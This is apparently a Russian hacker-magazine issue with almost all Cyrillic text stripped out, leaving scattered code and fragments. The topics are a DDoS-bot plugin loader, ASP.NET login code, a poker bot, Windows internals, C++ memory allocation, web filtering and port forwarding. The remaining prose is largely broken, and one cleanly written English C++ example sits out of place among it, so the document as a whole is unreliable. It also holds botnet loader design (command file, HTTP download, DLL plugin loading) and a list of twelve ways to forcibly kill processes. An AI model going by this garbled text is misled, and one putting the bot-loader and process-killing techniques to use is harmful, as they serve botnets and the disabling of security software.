    getch();
    return 0;
}

DDoS

,
,
srand() rand(). seed srand()
, , ,
rand().
generator() seed=123:
440
19053
23075

, seed , .

,
.

. ,
.
: , , , .
,

. , -
( seed),

.

.
.
(
).

.NET



. , ,


Master

Bot


.
, ,
.
][ ONLINE -
ASP.NET. ,
-
. -,
, ( ) ().
- .

:
, ;
,
.

- Config.Web :
<configuration>
<security>
<authentication mode="Cookie"/>
</security>
</configuration>


Cookies-. (UserLogin UserPassword), , , cookies-, ,
:
<script language="C#" runat="server">
void Login_Click(Object sender, EventArgs E) {
    if ((UserLogin.Value == "DotSiteTeam")
        && (UserPassword.Value == "BestITResource")) {
        CookieAuthentication.RedirectFromLoginPage(UserLogin.Value, true);
    }
    else {
        //
    }
}
</script>

ASP.NET , ,
URL,
: URL File.
, -


Bot

Bot
Bot
Bot

Bot

.
, URL
, , :
<authorization>
<allow users="*" />
<deny users="?" />
</authorization>

, , ,
- ASP.NET, ,
.


. ? , , -
,
. . ,
:
1. ;
2. ,
;
3. ;
4. .

(command.txt).
HTTPDownload(char *FileUrl, char *FileName). .dll .
, ,
, Windows: wininet.dll.
DLL API
, FTP, HTTP Gopher. API,
, WinSock TCP/IP, -.


,
.
,
:
, ,
. :

<(1)> [(1)] [(2)]
[(i)]
<(2)> [(1)] [(2)]
[(j)]

<(k)> [(1)] [(2)]


[(n)]

i, j, k (1; ).
:
1. k- ;
2. , , ( PlugLibrary());
3. PlugLibrary() , .
command.txt Parse(char
*FileName).
dll
, PlugLibrary

(
dll):
// load the plugin library
hPlugin = LoadLibrary(DllName);
// type (DefType) of the exported function
typedef int (*DefType)(char *);
/* look up the exported function Load */
DefType Load = (DefType)GetProcAddress(hPlugin, "Load");
/* call "Load" */
int iCode = (*Load)(Parametrs);

Load, ,
,
-.

.
:
-,
,

, ,

. , :
,
, .
, ,
. z

Web 2.0


.

.





MS Visual Studio 2010.

http://www.xakep.
ru/magazine/
xa/128/056/1.asp

:
.
http://msdn.
microsoft.com/ru-ru/
library/dd335939.
aspx

web ASP.
NET
http://defec.ru
,

,

.


CODING
Tim timreset@mail.ru, javatalks.ru

.
,
Holdem No Limit Poker
PokerStars.

. .

Ilogic IEventSimulation. , .
,
,
ILogic
.
int getAnswer(float p, float totalBet, float curBet,
float pot, int betting, int minRaise), 0,
(fold), 1 (call) 2
(raise).
,
.
: p (
poker room ]
[ ), totalBet
, curBet ,
, pot , betting ,
minRaise , . .

. IEventSimulation , .
:


changeBoardCard(int[] board)
, changePot(int pot)
, changeMoneyOfPlayers(int[]
money) , postDillerMessage(String message)
, changeDillerPosition(int
posOfDealer) ,
changePlayerStatus(int player, int status, int[] hand)
.

,
. , . ,
PokerStars
,
, . Holdem Poker PokerStars.
NoLimit Limit, -
.
: AggressiveLogic ( ),
CautiousLogic ( ), RationalLogic ( ), RaiseLogic ( ), CallLogic
( ), FoldLogic ( ),
RandomLogic ( ).
AggressiveLogic, CautiousLogic RationalLogic

HoldemConsole

HoldemForm

p*pot = win win .


, , (

). , CautiousLogic ,
, AggressiveLogic ,
. HoldemForm swinge
IEventSimulation ILogic.
, , , ..
,
Fold, Call Raise.
,
, .
HoldemConsole .

, ,
(playersList). ,
: trade(int betting) ,
startGame() , , int
getSinglePlayer() ,
, int getActivePlayer()
. set setBigBlind(int
bigBlind), setRoundCount(int roundCount).
, ,
, , ,
, , .
,
, ,
. .

. :
1) ;
2) ( );
3) ;
4) ();
5) ;
6) ();
7) ;
8) ();
9) ;
10) .
, ,
. , .
, , .
, .

.

, . -, :
(moneyOfPlayers), (handOfPlayers) (
) stateOfPlayers. -,
(posOfDealer), (pot), (bigBlind) (board).
,
(totalBet).

STARTGAME

,
:
,
, . :
, (
), .
,
.
,

. , , ,

, .
:
x = (x + 1) % 9;

x 0 8-9.
.

TRADE


== maxBet)) {
continue;
}
if (moneyOfPlayers[curPlayer] == 0) {
continue;
}


. 1 (-), 2 (), 3 (), 4
(). ,
,
. .
-


public int getAction(float p, float totalBet, float
curBet, float pot, int betting, int minRaise) {
if (curBet == 0) {
btnCall.setText("Check");
} else {
btnCall.setText("Call " +
String.valueOf(curBet));
}
btnCall.setVisible(true);
btnFold.setVisible(true);
btnRiase.setVisible(true);
btnRiase.setText("Raise " +
String.valueOf(curBet + minRaise));
frame.repaint();
action = -1;
while (action == -1) {
try {
Thread.sleep(500);
} catch (InterruptedException e) {
e.printStackTrace();
}
frame.repaint();
}
btnCall.setVisible(false);
btnFold.setVisible(false);
btnRiase.setVisible(false);
frame.repaint();
return action;
}

: ,
. , (
),
.

//
curPlayer = (curPlayer + 1) % 9;
if (getSinglePlayer() != -1) {
break;
}
if (stateOfPlayers[curPlayer] == false) {
continue;
}
if ((repeatTrade == true) && (betOfPlayers[curPlayer]


. ,
ILogic :

float p = logic.getProbabilityOfWin(handOfPlayers[curPlayer], board, getActivePlayers());
int action = playersList.get(curPlayer).getAction(p,
    totalBet[curPlayer] + betOfPlayers[curPlayer],
    maxBet - betOfPlayers[curPlayer], pot, betting,
    maxBet == 0 ? bigBlind : maxBet);

:
, (,
) .
getAction ;
;
, ,
,
;
; , ,
. ,
, .
( action) .
: fold, ;
call, , ,
all-in, ,
, , ; raise,
,
, .
,
, , (all-in). ,
. -
, ,
.

.
:
HoldemForm
List<ILogic> playersList=new ArrayList<ILogic>();
playersList.add(frame);
playersList.add(new FoldLogic());
playersList.add(new CautiousLogic());
playersList.add(new CallLogic());
playersList.add(new RationalLogic());
playersList.add(new AggressiveLogic());
playersList.add(new CautiousLogic());
playersList.add(new AggressiveLogic());
playersList.add(new RaiseLogic());

,
,

playersList.add(new RandomLogic());
playersList.add(new AggressiveLogic());
playersList.add(new RaiseLogic());


:
http://www.pokerbonus.org.ua/menu/pravila.html
http://www.tehasskiy-holdem.info/
http://www.pokerstars.com/ru/poker/games/
texas-holdem/
:
http://poker-wiki.ru/poker/_
_
:
http://poker-wiki.ru/

50 15 .
, .
49 ( $750):
1-
2-
3-
4-
5-
6-
7-
8-
9-

$580
$590
$570
$2220
$570
$680
$0
$750
$790


,


HoldemForm,


.

:
. , , , fold, call raise.
,
, ,
. ,
. - ,
,
timreset@mail.ru
,
, :
1) .
.
2) HoldemForm ,
changeDillerPosition . -
.
3) .
.
4) .
float . Int -
, , .
5)
.
. .
6) .
.
7) ,
, .
, . (-
,
, ),
. ,
, HoldemConsole.
:
HoldemConsole
playersList.add(new RationalLogic());
playersList.add(new FoldLogic());
playersList.add(new CautiousLogic());
playersList.add(new CallLogic());
playersList.add(new CautiousLogic());
playersList.add(new AggressiveLogic());

1-
2-
3-
4-
5-
6-
7-
8-
9-

$570
$560
$580
$2450
$590
$1110
$0
$890
$0

.
,
CallLogic, RaiseLogic (
) AggressiveLogic ( ).
?
RationalLogic , , ? , ,
, ,
.
,
( )
. ,
, .
, , ,
, .
CallLogic, RaiseLogic AggressiveLogic.
,
. , .
SB minRaise,
minRaise ,
.
, . , , ,


:)
. ,

-
. z


.

JavaDoc

,
.

.



http://poker-wiki.ru

aleksandr-ehkkert@rambler.ru

WINDOWS

,
. , ,
, .
.

,
.
, , - . Windows,
:). ,
Windows. , ,
,
.

,
, ,
.
, .
,
,
. ,
, ,
Windows . , .

LPRESERVED DLLMAIN
DllMain:
BOOL WINAPI DllMain(
    __in HINSTANCE hinstDLL,
    __in DWORD dwReason,
    __in LPVOID lpReserved
);

( ) .
, ? ,
lpReserved,
? , Microsoft.
MSDN , / ; ,
. , , lpReserved .
: lpReserved , , !
:
APC AsyncProcedureCall,
LdrInitializeThunk, Ntdll.dll.
, LdrInitializeThunk,
CONTEXT, , .. APC,
LdrInitializeThunk. ntdll!LdrInitializeThunk,
, CreateThread.

ntdll.dll kernel32.dll explorer.exe firefox.exe


( !),
CreateThread APC
LdrInitializeThunk .
: , dwReason DLL_
PROCESS_ATTACH ( ), lpReserved
NULL non-NULL
.
, fdwReason DLL_PROCESS_DETACH
( ), lpReserved NUL
FreeLibrary DLL, nonNULL .
Microsoft ? ,
:). ,
! ? ?
SetThreadContext ? ,
. -, CONTEXT
.
CONTEXT ( ).
DEBUG- .
, , TF EFLAGS
-, lpReserved->Eip .
,

.
, .

DLL

, ,
ntdll.dll, kernel32.dll user32.dll
, Microsoft . ?
,

. , ntdll.dll
. .

. ,
ntdll!LdrInitializeThunk. ntdll!KiUserApcDispatcher

,
.

. ,

( ), ntdll.dll . Kernel32.dll
,


. , kernel32.dll
( Ctrl+C ,
?). , Ctrl+C
. user32.dll ,
, win32k.sys
, Windows.
win32k.sys
NtUserInitializeClientPfnArrays .


WinDBG,
Windows,
-
,

.

? - !


? , ,
. .
( ) Win32-
,
. , CSRSS

Ctrl+C/Ctrl+Break.
-, Win32-API-
.
, WSAAsyncGetHostByName
gethostbyname ,

.

X86 WOW64

Windows

.



,
www.alex-ionescu.
com http://j00ru.
vexillium.org.

Wow64 32- dll, Win32 API-


32- EXE-DLL

32- Ntdll. dll

, ,
32-
Wow64,
GetThreadContext/SetThreadContext, .

Wow64. , THREAD_QUERY_
INFORMATION.


Wow64c pu.dll

Wow64.dll

Wow64win.dll

64- Ntdll. dll

Ntoskrnl.exe

wow64

( Wow64-).
32- dll Wow64-?
64- Windows dll 32- 32- . , Wow64-
ws2_32.dll Vista x64 , 32- ws2_32.
dll Vista x86. , dll , , ntdll.dll.
x86 ntdll.dll,
,
SystemCallStub SharedUserData:
lkd> u ntdll!NtClose
ntdll!ZwClose:
mov eax,30h
mov edx,offset SharedUserData!SystemCallStub
call dword ptr [edx]
ret 4

Wow64- ntdll . 0xc0 32-


TEB (Thread Environment Block):
lkd> u ntdll!NtClose
ntdll!ZwClose:
mov eax,0Ch
xor ecx,ecx
lea edx,[esp+4]
call dword ptr fs:[0C0h]
ret 4

, TEB 0xc0
, WOW32Reserved:
lkd> dt ntdll!_TEB
+0x000 NtTib : _NT_TIB
[skip...]
+0x0c0 WOW32Reserved : Ptr32 Void

, ,
12 :
1) TerminateProcess NtTerminateProcess
, , ;
2) CreateRemoteThread ExitProcess.
ExitProcess , ;
3) NtQuerySystemInformation toolhelp32
TerminateThread or NtTerminateThread. TerminateThread (NtTerminateThread);
4) NtQuerySystemInformation toolhelp32, SetThreadContext EIP ,
ExitProcess;
5) 0 4096 DuplicateHandle TargetProcess TargetProcessHandle NULL, Options
0x1. ,
.
, , notepad.exe;
6)
CreateJobObject, AssignProcessToJobObject TerminateJobObject;
7) , NtCreateDebugObject ,
NtDebugActiveProcess, -
( ) CloseHandle;
8)
VirtualQueryEx PAGE_NOACCESS
VirtualProtectEx. ,
;
9) VirtualQueryEx,
WriteProcessMemory
;
10)
VirtualQueryEx. ,
;
11) PsTerminateProcess (PspTerminateProcess).
, ;
12)
PspTerminateThreadByPointer. ,
.
, ,
PspTerminateThreadByPointer
, .

, , . .
,
, Windows
.
. ! ,
! z

CODING
deeonis deeonis@gmail.com

C++

++ , ,
. ? :).
NEW DELETE, ,

,
.
, C++ ,
, ,
.
. , , (, Java C#),

,

.
, , , ,
C++. ,
. ,
. ,
, , .

.


new delete?

,
. new delete
, .
, , . ,
. ,
delete. , delete
. .
,

.
.
,
, ? , . new
. delete
, , .
, - , .
new delete, ,
.
, ,
, .
,
, ,
.
, ,
.
, new delete

, .

, . , , new delete
,
, ;
( ), ..
new delete
. -


CODING
PREDIDENTUA / HTTP://TUTAMC.COM/

, C++

, :
, ,
,

, - .

.

new

new delete . , ,
new . ,
, .
new
#include <cstdlib>
#include <new>

static const int signature = 0xADADEAEA;
typedef unsigned char Byte;

void *operator new(std::size_t size) throw(std::bad_alloc)
{
    using namespace std;
    // room for the block plus a signature word on each side
    size_t realSize = size + 2 * sizeof(int);
    void *pMem = malloc(realSize);
    if (!pMem)
        throw bad_alloc();
    // leading signature
    *(static_cast<int*>(pMem)) = signature;
    // trailing signature, right after the caller's bytes
    *(reinterpret_cast<int*>(static_cast<Byte*>(pMem) + realSize - sizeof(int))) = signature;
    return static_cast<Byte*>(pMem) + sizeof(int);
}

malloc
, ,
, .
, , . , .
, ,
, , double
. , .
C++ , , new,


++
. malloc
, , ,
, , ,
, , .
double , int
, new, ,
,
.
, , .
new, - new.

- new

new , .
new
.
new,
.

, new - (newhandler), . ,
set_new_handler,
<new> :
set_new_handler
namespace std {
typedef void (*new_handler) ();

.
abort exit, , ,
. new,
.
,
set_new_handler new. set_new_handler new ,
operator new ,
new ,
.


new_handler set_new_handler(new_handler p)
throw();
}

, new_handler typedef ,
, set_new_handler
, new_handler. new
.
(set_new_handler). :
set_new_handler
#include <cstdlib>
#include <iostream>
#include <new>

// new-handler: report the failure and terminate instead of retrying
void outOfMem()
{
    std::cerr << " \n";
    std::abort();
}

int main()
{
    std::set_new_handler(outOfMem);
    int *pBigDataArray = new int[100000000L];
    ...
}

new ,
. - ,

. .
. new-handler
, , ,
- , .
set_new_handler , new
.
- new bad_alloc , .
new,

new
class Widget {
public:
    static std::new_handler set_new_handler(std::new_handler p) throw();
    static void *operator new(std::size_t size) throw(std::bad_alloc);
private:
    static std::new_handler currentHandler;
};
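The signature-writing operator new above and the class-specific operator new of Widget are only half of the scheme: the guard words are useful once something checks them on release. The following is an added example, not the article's code, that pairs a guarded allocator with a checking release routine and routes a Widget-style class through it; guardedAlloc, guardedFree, kGuard and corruptedFrees are names chosen for this example.

```cpp
#include <cstddef>
#include <cstdlib>
#include <cstring>
#include <new>

// Guard word written before and after every block, same idea as the
// signature in the article's operator new, but here it is also verified
// when the block is released.
static const unsigned int kSignature = 0xADADEAEA;
typedef unsigned char Byte;

// Each guard slot is sizeof(double) bytes rather than sizeof(int): the
// article notes that shifting malloc's result by sizeof(int) can break
// the alignment doubles need, so the slot is padded to that size.
static const std::size_t kGuard = sizeof(double);

void *guardedAlloc(std::size_t size)
{
    std::size_t realSize = size + 2 * kGuard;
    void *pMem = std::malloc(realSize);
    if (!pMem)
        throw std::bad_alloc();
    Byte *base = static_cast<Byte*>(pMem);
    std::memcpy(base, &kSignature, sizeof kSignature);                 // leading guard
    std::memcpy(base + kGuard + size, &kSignature, sizeof kSignature); // trailing guard
    return base + kGuard;
}

// Returns false if either guard was overwritten (a write before or after
// the block), true otherwise; the memory is freed in both cases.
bool guardedFree(void *p, std::size_t size)
{
    if (!p)
        return true;
    Byte *base = static_cast<Byte*>(p) - kGuard;
    unsigned int front = 0, back = 0;
    std::memcpy(&front, base, sizeof front);
    std::memcpy(&back, base + kGuard + size, sizeof back);
    bool intact = (front == kSignature) && (back == kSignature);
    std::free(base);
    return intact;
}

// Class-specific new/delete (as in the article's Widget) routed through
// the guarded allocator; the sized operator delete gives guardedFree the
// block length it needs to locate the trailing guard.
class Widget {
public:
    int data[4];
    static void *operator new(std::size_t size) { return guardedAlloc(size); }
    static void operator delete(void *p, std::size_t size)
    {
        if (!guardedFree(p, size))
            ++corruptedFrees;
    }
    static int corruptedFrees;
};
int Widget::corruptedFrees = 0;

// A Widget used within its bounds: both guards survive.
bool cleanWidgetIsIntact()
{
    int before = Widget::corruptedFrees;
    Widget *w = new Widget;
    w->data[3] = 42;
    delete w;
    return Widget::corruptedFrees == before;
}

// Constructed fault: a one-byte overrun of an 8-byte buffer lands in the
// trailing guard slot, so guardedFree reports the corruption.
bool overrunIsDetected()
{
    const std::size_t n = 8;
    Byte *buf = static_cast<Byte*>(guardedAlloc(n));
    std::memset(buf, 'A', n + 1);   // writes one byte past the end
    return !guardedFree(buf, n);
}
```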

new, Widget,
. -,
set_new_handler, Widget. new-handler
. operator new.
new, Widget.
, new ,
new . , new,
Widget,
new-handler.

,
.
. C++ ,
, , ,
..
,
.

. ,
, .
.
, , ,
new delete,
open source . ,
Pool Boost. ,

C++.

,
new delete. ,
.z


SYN/ACK
grinder grinder@synack.ru, _ssh3r1ff- ssh3r1ff@gmail.com


, , . , : !.
WINDOWS
Windows , IP- . , advfirewall
MMC ( ),
. , , .
netsh,

. netsh *.wfw,
. , advfirewall
. , IP
URL, . , IE ,
: ,
, , .
DNS.
,
IP , HOSTS ( c:\Windows\System32\drivers\etc\hosts)
. :
127.0.0.1 odnoklassniki.ru
127.0.0.1 www.odnoklassniki.ru

, , , .

, .
: NAT,
VPN-, , ,
P2P- . KWF - ,
][ 2007 ,
.
. ->
. KWF ,
,
URL HTTP FTP
. , . ,
,
, . ,
,
, - . -> URL,
URL, . , Ads/banners, Search engines,
Automatic Updates Windows Update. .
, ,
(, Social network), (URL URL)
:
odnoklassniki.ru/*

,
:
*.odnoklassniki.ru/*

KERIO WINROUTE

Kerio WinRoute, -


,
. ,

, (- dostupest.ru).
HTTP
.
,

, .
-> -> HTTP.
, URL,
. , .
,
Remove advertisement and banners .
, ,
. , , ,
.
URL .
: , URL,
Web Filter ( ), ,
IP (, , ).
Social network; -.
, ,
. . ,
, , IP ( ), . KWF
.
- ( ActiveX, HTML JavaScript).
-, HTML.
, .
.

, ( 70),
. .
,
URL (*). ,
-, .
KWF . Kerio Web Filter, - ISS
Orange WebFilter.
58 -, . -
, 20
, , ,
. , .
, Kerio Web Filter .
FTP .
KWF , upload . ,
,
. : , IP-
, , FTP-.
, IM-
KWF . , login.icq.com, id.rambler.ru
URL, IM-. ,
IP , ,
][ 2009 .
,
, , Instant Messengers,
IP:
- Rambler ICQ: 81.19.64.0 - 81.19.66.255;
- icq-ws.rambler.ru: 81.19.69.0 - 81.19.70.255;



Windows
- ICQ: 64.12.0.0 - 64.12.255.255, 205.188.0.0 205.188.255.255

.
. (ICQ Deny), -> IP-,
Instant Messengers. .
. ,
.
. , , , ,
. , Mail.ru Agent 2041, 2042; Yahoo! Messenger 5000-5001, 5050; MSN 1863;
Jabber/Gtalk 5222, 5223; IRC 6667-6669.
.
P2P.
-P2P , .
,
P2P ( 120 ).
, ,
. , - -

007

: .
. ,
, - .
LanAgent (lanagent.ru). ,
, , . ,
, ,
.
, , ICQ e-mail, , ,
, . .
,
.


URL Kerio WinRoute


,
. P2P, ,
,
. , -P2P.
: , eDonkey, DC++, Gnutella, Kazaa
. , Kerio
DNS ( DNS) IP, . : vkontakte.
ru 127.0.0.1.
.

SURFANALYZER
SurfAnalyzer (surfanalyzer.ru) ,
,
. ,
,
, (.exe, .com,
.zip ..), , IM-, . , , , ,
.

e-mail ICQ. SurfAnalyzer , ,
, :
(Server) , - ( , ,
, IM),
( ), Firebird
; ;
(View)
e-mail, ICQ -;
(Admin)
,
.

SurfAnalyzer
- (UserGate, WinGate ..)
-

URL ,
View. , ,
, . ,
:).

SurfAnalyzer
SurfAnalyzer, . SurfAnalyzer.
SurfAnalyzer ,
Win2k/XP/2k3. : CPU 1.7 , 256 RAM 200 HDD.
; , Firebird,
. ServiceManager.
SurfAnalyzer Admin, Admin .
, IP.
.
-, (Web+ICQ),
SurfAnalyzer (
3128), POP3 SMTP, . ,
-. , -, .. IP- SurfAnalyzer.

. e-mail-,
SurfAnalyzer, . ,
.
, , Web + ICQ + Mail Agent. SurfAnalyzer IP, IP+.

, , IP- -. ,
, .
: . , MIME-.

. ,
.
MIME-/ . ,
SurfAnalyzer,
. -
URL, SurfAnalyzer.
, : ,
. , odnoklassniki. ,
. IP.
SurfAnalyzer
, ICQ + Mail Agent. ,

TRAFFPRO
TraffPro (traffpro.ru)
.
, ( Panasonic LG), ,
, NAT, -,
c- Squid. IP,
, , LDAP/AD VPN.
. TraffPro Qt, MySQL,
gnuplot.
Linux, Windows Linux, -.
, Free-, .
,
.
Linux LAMP- (. ][ 12.2008) .
,

, . ,

. , Linux,
iptables (TraffPro iptables
/etc/traffpro/traffpro_rule.cfg).
LAN2NET FIREWALL
Lan2net NAT Firewall (lan2net.ru)
,
, ,
.
, , , Microsoft Small Business Specialist.
Lan2net ,
,
URL IP.
IP firewall
. () IP-.
, IP-
.
. URL,
.
'*',
, .
: *.mp3, *.avi, *.mpg .. z

LanAgent NetworkFilter
, , SurfAnalyzer
LanAgent NetworkFilter,
: ICQ, MSN, mail.ru
; ;
. , -.
.


SYN/ACK
j1m@synack.ru

,
, , , -/-, DNAT/PAT.
, .
, -
NAT.
IPv4
. ,
, , ,
, NAT.

IP-, ,
IP-.
, NAT', ,
, . , -, SMTP- FTP-,
IP- - . DNAT , -
. ,

. ,
, .

,
, Windows ,
.
, .
,
,
. :
, ,
,
.
WINDOWS
, , .
Windows.
NAT:


1. -> ,
, IP- -> NAT.
2. NAT .
3. ,
.
4. , (, ), .

LINUX
Linux ,
iptables/netfilter, .
DNAT,
PREROUTING.
:
iptables -t nat -A PREROUTING -p tcp --dst $GATE \
--dport $PORT -j DNAT --to-destination $SERVER:$PORT

$GATE , $PORT ,
$SERVER:$PORT . ,
, (
):
# echo 1 > /proc/sys/net/ipv4/ip_forward

:
$IPTABLES -t nat -A PREROUTING -p tcp --dst $IP \
    --dport $PORT -j DNAT --to-destination $SERVER:$PORT
$IPTABLES -t nat -I POSTROUTING -p tcp --dst $SERVER \
    --dport $PORT -j SNAT --to $IP

, .
iptables-, ,
, Debian, arno-iptables-firewall,

. For example, to forward port 80 to 192.168.0.100, set
NAT_TCP_FORWARD="80>192.168.0.100" in /etc/arno-iptables-firewall/firewall.conf and restart the firewall:
$ sudo /etc/init.d/arno-iptables-firewall restart

FREEBSD
FreeBSD , NAT ( , ).
natd , ,
, ,
.
kernel nat, NAT,
FreeBSD. , ipfw.
, , . kernel nat
FreeBSD ,
, ,
. ,
: natd, divert --. NAT
natd :
1. natd ipfw /etc/rc.conf:
# vi /etc/rc.conf
# natd
natd_enable="YES"
# rl0
natd_interface="rl0"
natd_flags="-f /etc/natd.conf"
# ipfw
firewall_enable="YES"
firewall_type="/etc/ipfw.conf"

2. NAT /etc/natd.conf:
# vi /etc/natd.conf
same_ports yes
use_sockets yes
# redirect_port <proto> <internal-ip>:<internal-port> <external-port>
redirect_port tcp 192.168.0.100:80 80

3. , (rl1) ,
natd , divert
/etc/ipfw.conf:
ipfw add divert natd ip from any to any in via rl1

:
ipfw allow tcp from any to 192.168.0.100 \
dst-port 80 in via rl0 setup

.
: NAT. NAT ,
- .
, ,
80-
:
# vi /etc/ipfw.conf
# NAT
nat 1 config log if rl1 reset same_ports \
redirect_port tcp 192.168.0.100:80 80
# NAT
add nat 1 ip from any to any via rl1

'nat' , , natd. ,
same_ports NAT
( RPC-). redirect_port
, /etc/natd.conf.



DD-Wrt
OPENBSD
,
OpenBSD. NAT
pf,
ipfw , , iptables.
80- pf :
# vi /etc/pf.conf
# NAT
nat on rl1 from 192.168.10.0/24 to any -> $out_ip
#
rdr on rl1 inet proto { tcp, udp } from any \
to $out_ip port 80 -> 192.168.0.100

, rl1 , 192.168.0.100
, out_ip .
, , 80-,
port
.
, , ,
- :
rdr on rl1 inet proto { tcp, udp } from any \
to $out_ip port 5000:10000 -> 192.168.0.100

. .: , bittorrent:
rdr on $ext_if inet proto tcp from any to $ext_if \
port 6881:6889 -> $myhost port 6881:6889
pass in quick on $ext_if inet proto tcp from any \
to $myhost port 6880 >< 6890 keep state

,
,
.
: pass -

Universal Plug and Play (UPnP) ,


.
,

. .



D-Link DIR-300
rdr ,
,
(.
SQL-).
.
, OpenBSD 4.7
:
pass out on rl1 from 192.168.0.0/24 to any \
nat-to $out_ip
pass in on rl1 proto tcp from any to any \
port 80 rdr-to 192.168.0.100

CISCO


Cisco. , ,
, , .
, Cisco PIX (Private Internet Exchange)
ASA (Adaptive Security Appliance)
:
static (inside,outside) tcp 1.2.3.4 www \
192.168.0.100 www netmask 255.255.255.255

, Cisco IOS, :
ip nat inside source static tcp 192.168.0.100 80 \
1.2.3.4 80

80
192.168.0.100 1.2.3.4.
, /
.

OPENWRT DD-WRT
, Cisco

. - , D-Link,
ASUS, Linksys .
OpenWrt, X-Wrt DD-wrt,

OpenBSD, pf NAT

, ,
Destination Ports, . Save.
,
/etc/config/firewall :
forward:proto=tcp dport=80:192.168.0.100:80

SQL-
. , .
DD-Wrt
-. ,
- (192.168.1.1),
NAT/QoS, . , ,
www, - , TCP
UDP, IP- , -
. , , .
, ,
(), ( VPN/PPTP).
, , ppp0, VPN/PPTP, .
DD-Wrt. .,
iptables:
iptables -t nat -A PREROUTING -p tcp -i ppp0 \
--dport 80 -j DNAT --to 192.168.0.100:80

. .
- X-Wrt,
, , OpenWrt.
Network, Firewall, New Rule
Forward Add. Forward To IP-
, Port
. Protocol
Add, : TCP UDP. ,



, , ,
FreeBSD.
( , , Minix
:)). SSH.
, . , ,
. , NAT',
, . ,
-. SSH-,
. ? .
(serverip , gateway-ip ):
$ ssh -L 8080:<server-ip>:80 user@<gateway-ip>

, 8080 80 . -
localhost:8080, , . SSH-
SSH- ,
80 .
,
.
rinetd ,
.
Linux- BSD-.
/etc/rinetd.conf
(/usr/local/etc/rinetd.conf), :
1.2.3.4 80 192.168.0.100 80

() :
$ sudo /etc/init.d/rinetd restart

Ubuntu :



X-Wrt

# /usr/local/etc/rc.d/rinetd start

FreeBSD. FreeBSD rinetd


:
# echo 'rinetd_enable="YES"' >> /etc/rc.conf

, 80 1.2.3.4,
IP-
192.168.0.100.
UNIX- socket
- inetd. ,
, . /etc/inetd.conf (

UDP-
NAT

pwnat (http://samy.pl/pwnat/)
, NAT-,
, NAT, .
, , pwnat.

192.168.0.2
HighID eDonkey-:
# vi /etc/pf.conf
rdr pass on $ext_if inet proto tcp from any \
    to any port 4661 -> 192.168.0.2
rdr pass on $ext_if inet proto tcp from any \
    to any port 4662 -> 192.168.0.2
rdr pass on $ext_if inet proto udp from any \
    to any port 4665 -> 192.168.0.2
rdr pass on $ext_if inet proto udp from any \
    to any port 4672 -> 192.168.0.2


Windows 2003 Server


xinetd,
) :
1 stream tcp nowait root /usr/local/bin/socket socket 192.168.0.100 2

1 -, 2
192.168.0.100.
(www, ftp ..),
( ), /etc/services.
inetd kill -HUP
. , /etc/hosts.allow.
.

, DNAT ,
,
. ,

, . z

SYN/ACK
j1m@synack.ru



-
- ,
. ,
, . , , ,
. ,
, .
- ,
. ,
,
. , , , .
,
, .
, -,
- -,
PHP' CMS. , . , ,
, . ,
,
( ). ,
.
, - .
:
Apache;
PHP;
eAccelerator;
Nginx -;
Memcached;
.

APACHE
- ,
, Apache. , HTTP-,
-,
-.
: Apache , . . , HTTP- :
Apache ,

( LoadModule).

,
.
Apache

. Apache2 , ,

MPM. - (Multi-processing module),
HTTP-. :
1. prefork MPM, -, Apache 1.3.
. ,
. .
2. worker MPM, .
, . .
prefork, .
3. event MPM. ,
, , nginx.
MPM, ( ).

Apache, MPM,
apache2-mpm.
Apache MaxClients.
,
, ,
,
. ,
, Apache, ( ps top).
HTTP-, Apache
keep-alive,
/ . Keep-alive ,
, CSS
.
, .



KeepAliveTimeout 5-10 , ,
, HTML/PHP,
keep-alive , KeepAlive
Off.
Apache . , , , ,
.
(, ,
GPRS), ,
, .

PHP
HTTP-, ,
-.
- PHP,
. /etc/php5/
apache2/php.ini ( Ubuntu,
) :
memory_limit -
.
.
display_errors = Off, error_log = /var/log/php log-. ,
.
upload_max_filesize post_max_size POST-. ,
-.
PHP-.
EACCELERATOR
PHP . , ,
, PHP-, . ,
,
. ,


eAccelerator,
PHP , . PHP-
( ).
eAccelerator ,
.
:
$ sudo apt-get install php5-dev build-essential

eAccelerator:
$ cd /tmp/
$ wget http://bart.eaccelerator.net/source/0.9.6.1/eaccelerator-0.9.6.1.tar.bz2
$ tar xvjf eaccelerator-0.9.6.1.tar.bz2
$ cd eaccelerator-0.9.6.1
$ phpize
$ ./configure --enable-eaccelerator=shared
$ make
$ sudo make install

:
$ sudo mkdir -p /var/cache/eaccelerator
$ sudo chmod 0777 /var/cache/eaccelerator

, , eAccelerator PHP ( ):
# vi /etc/php5/apache2/php.ini
[PHP]
; load the extension
extension = "eaccelerator.so"
eaccelerator.enable = "1"
; shared memory reserved for the cache (MB)
eaccelerator.shm_size = "64"
; on-disk cache directory
eaccelerator.cache_dir = "/var/cache/eaccelerator"
; enable the opcode optimizer
eaccelerator.optimizer = "1"
; recompile a script when its modification time changes
eaccelerator.check_mtime = "1"
; no debug output
eaccelerator.debug = "0"
; cache only files matching these patterns (empty means all)
eaccelerator.filter = ""
; largest single script kept in shared memory (0 = no limit)
eaccelerator.shm_max = "0"
; lifetime of a script in shared memory,
; 1 hour (3600 seconds)
eaccelerator.shm_ttl = "3600"
eaccelerator.shm_prune_period = "0"
; cache to disk as well, not only to shared memory
eaccelerator.shm_only = "0"
; compress the on-disk cache
eaccelerator.compress = "1"
eaccelerator.compress_level = "9"

Apache MPM- Ubuntu

phpinfo() eAccelerator

Nginx
NGINX
, - , Apache .

Round robin DNS .


IP- .
, :
,
.

, , HTTP-. Apache
, -
, ,
HTTP- , . HTTP- Nginx Apache
. Apache, Nginx
,
HTTP-.
,
(
HTTP-). Nginx ,
,
, Apache
Nginx . .
/etc/apache2/ports.conf :
NameVirtualHost *:81
Listen 81

Nginx:
$ sudo apt-get install nginx

:
# vi /etc/nginx/nginx.conf
# user the Nginx worker processes run as
user www-data;
# number of Nginx worker processes
worker_processes 1;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
    worker_connections 1024;
}
http {



Memcached slab-

    # MIME types
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    server_names_hash_bucket_size 64;
    access_log /var/log/nginx/access.log;
    sendfile on;
    #tcp_nopush on;
    #keepalive_timeout 0;
    keepalive_timeout 65;
    tcp_nodelay on;
    # gzip compression
    gzip on;
    gzip_proxied any;
    gzip_min_length 1100;
    gzip_http_version 1.0;
    gzip_buffers 4 8k;
    gzip_comp_level 9;
    gzip_types text/plain text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript;
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;
}

INFO

info

Gzip Deflate ,
Gzip-

.

Nginx Apache

:
